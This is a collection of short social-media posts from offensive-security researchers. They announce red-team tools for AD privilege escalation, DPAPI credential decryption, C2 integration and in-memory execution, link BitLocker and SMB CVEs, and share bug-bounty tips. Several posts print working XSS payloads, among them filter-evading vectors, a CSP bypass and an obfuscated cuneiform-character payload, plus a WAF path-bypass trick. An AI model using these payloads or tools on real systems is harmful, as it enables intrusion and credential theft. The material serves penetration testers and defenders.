How to WebDAV Relay LPE on Windows 11: 1-3. Trigger start of EFS service trough Explorer 4-11. Continue like on Windows 10 Thanks again ret2src for the idea. Any tip for triggering EFS remotely on Windows 11 would be greatly appreciated by the way :D

You can bypass path-based WAF restrictions by appending raw/unencoded non-printable and extended-ASCII characters like \x09 (Spring), \xA0 (Express), and \x1C-1F (Flask):

Some KNOXSS #XSS Vectors Main + Inline 1')"<!--><Svg OnLoad=(confirm)(1)<!-- Full URL Validation JavaScript://%250Dtop.confirm?.(1)// Weak CSP Bypass 1'"><!--><Base Href=//X55.is? Regular JS Injection 1'-top['con\146irm'](1)-' Quoteless JSi /confirm?.(1)//\ #XSS #BugBounty

NetExec v1.4.0 has been released! 🎉 There is a HUGE number of new features and improvements, including: - backup_operator: Automatic priv esc for backup operators - Certificate authentication - NFS escape to root file system And much more! Full rundown: github.com/Pennyw0rth/Net…

BitLocker Encryption Bypassed in Minutes via Bitpixie (CVE-2023-21563) – PoC Reveals High-Risk Attack Path securityonline.info/bitlocker-encr…

I write a Metasploit modules (for fun) that generate LNK file for two different Extra Data structure in Shell Link. Here is the proof of concept. github.com/nafiez/DataBlo…

Thanks to the awesome work of Aleem Ladha , the CTF Windows Active Directory lab for Barbhack from 2024 is now public! 🔥 You can build the lab and pwn the AD—13 flags to capture! No public write-up exists yet—waiting for someone to submit one! github.com/Pennyw0rth/Net…

rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session. github.com/0xTriboulet/rs…

Published a new WinDbg extension DLL to fetch kernel's DirBase using the Low Stub technique. This is not a novel technique but I did find some projects out there that seemed to be doing this incorrectly. Hope this helps :) github.com/winterknife/EV…

Automated deployment of red team infrastructure through GitHub Actions workflows. It supports configurable C2 frameworks and phishing operations with a focus on secure, repeatable deployments. github.com/CultCornholio/…

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️ Read Here - akamai.com/blog/security-…

Someone made a python version of Evilwinrm and it works well! Although it is missing a few features like bypassing amsi I would add this into your tools to have: github.com/adityatelange/…

Windows SMB Client Elevation of Privilege Vulnerability CVSS Score: 8.8 Attack Vector: Network Attack Complexity: Low Privileges Required: Low User Interaction: None Do I have to say more? msrc.microsoft.com/update-guide/v…

Run native PE or .NET executables entirely in-memory github.com/NtDallas/MemLo…

an XSS payload, Cuneiform-alphabet based 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() #bugbounty #bugbountytips #cybersecurity

My new tool, Invoke-PowerDPAPI is able to obtain system master keys and decrypt various DPAPI encrypted material such as credentials, vaults and local SCCM encrypted blobs for NAA credentials and task sequences. Github: github.com/The-Viper-One/… Let me know what you think 😁

After today’s talk at #TROOPERS25 I’m releasing BitlockMove, a PoC to execute code on remote systems in the context of a loggedon user session 🔥 github.com/rtecCyberSec/B… No need to steal credentials, no impersonation, no injection needed 👌

To trigger local SYSTEM authentication for relaying to ADCS or LDAP for LPE you would usually need the printer service or EFS service to be enabled (printerbug/petitpotam). Here is an alternative without this requirement 🤠 github.com/rtecCyberSec/R…

Another Pentest, another time the NetExec Veeam module didn't work properly. Sometimes SYSTEM impersonation is needed, sometimes it's flagged by AMSI. You need to know about alternatives. SharpVeeamDecryptor now supports v12 and PostgreSQL Veeam instances 😎